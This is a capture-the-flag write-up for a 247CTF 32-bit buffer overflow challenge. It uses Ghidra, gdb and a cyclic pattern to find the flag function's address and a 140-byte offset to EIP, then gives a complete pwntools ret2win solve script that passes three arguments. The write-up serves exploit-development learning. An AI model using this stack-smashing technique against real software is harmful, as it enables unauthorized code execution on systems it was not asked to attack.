![6e6bfa535b863692b8813994ce5fcb03.png](0153c2791a3845058c6d96370cf5b235.png)
We need to call the hidden `flag` function and pass it some parameters. I used Ghidra to take a look at the function.
![a667f64a9ae418de64ec7be7c49d5f17.png](5cdd2f4781174688b94c23f8dca312b6.png)
So we need to pass it `0x1337`, `0x247`, and `0x12345678`, in that order.
Let's find the function using `gdb`
`info func`
![03b462ec387899400230b91290c24296.png](93de95d5d266449290c77ede45b99d29.png)
The function is at `0x08048576`
Now let's find the offset
`pattern create 200`
Pass the pattern to the program
![b5a7d835eec89459242c6eec7b3d7837.png](82d6c47046604bf8ab7005d522ec59fa.png)
The program segfaults with `EIP` = `0x6261616b`, which is the pattern bytes `kaab` read little-endian. `pattern search` on that value tells us the offset from the start of the buffer to the saved return address.
![35f868eb885d113a1007cbeec300699c.png](3433d02b780a45d4a61862038b7b680c.png)
Okay, so now we know the offset is 140. Let's test to make sure we can control `EIP`:
`pi print('A'*140 + 'B'*4)`
Passing that to the program, we get a segfault at `0x42424242`: the four `B`s landed in `EIP`. Perfect. We control `EIP`.
![5fd9af10a99dcef0894c78b596c2acee.png](b87c64c10cb546b6ab18bb3d7dc5c7e2.png)
Let's build our payload.
The structure of our payload is as follows:
`padding + flagfunc + 4 bytes for a return address + param1 + param2 + param3`
1. Padding
    - `'A' * 140`, the offset we found earlier (buffer start up to the saved `EIP`)
2. Flag function address
    - `p32(0x08048576)`, the address packed little-endian with pwntools; the `ret` pops it into `EIP`
3. Four bytes for a return address
    - `'B' * 4`, any four bytes will do. On 32-bit x86 (cdecl) a function expects its own return address at `[esp]` when it starts, so `flag` treats this as the place to return to; the program may crash there once `flag` returns, but by then the flag has already been printed
4. Parameter 1
    - `p32(0x1337)`, the first argument, read by `flag` from `[esp+4]`, packed little-endian
5. Parameter 2
    - `p32(0x247)`, the second argument, at `[esp+8]`, packed little-endian
6. Parameter 3
    - `p32(0x12345678)`, the third argument, at `[esp+12]`, packed little-endian
My solve script:
```python
# pwntools
from pwn import *

# local process, with gdb attached so the ret into flag() can be watched
p = process('./hidden_flag_function_with_args')
gdb.attach(p)
# remote target (uncomment for the real service and comment out the two lines above)
#p = remote('458b4cea0dae8dff.247ctf.com', 50078)

# payload pieces
padding = b'A' * 140        # buffer start up to the saved EIP, from pattern search
funcloc = p32(0x08048576)   # address of flag(), from `info func`
fake_ret = b'B' * 4         # what flag() will see as its return address
param1 = p32(0x1337)
param2 = p32(0x247)
param3 = p32(0x12345678)

# layout: padding + flag address + fake return address + arguments left to right (cdecl)
payload = padding + funcloc + fake_ret + param1 + param2 + param3

# receive the program's banner up to 'though:' and the newline after it
print(p.recvuntil(b'though:'))
p.recvline()
# send the payload
p.sendline(payload)
# receive the flag
print(p.recvall())
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow #scripting #pwn
Related: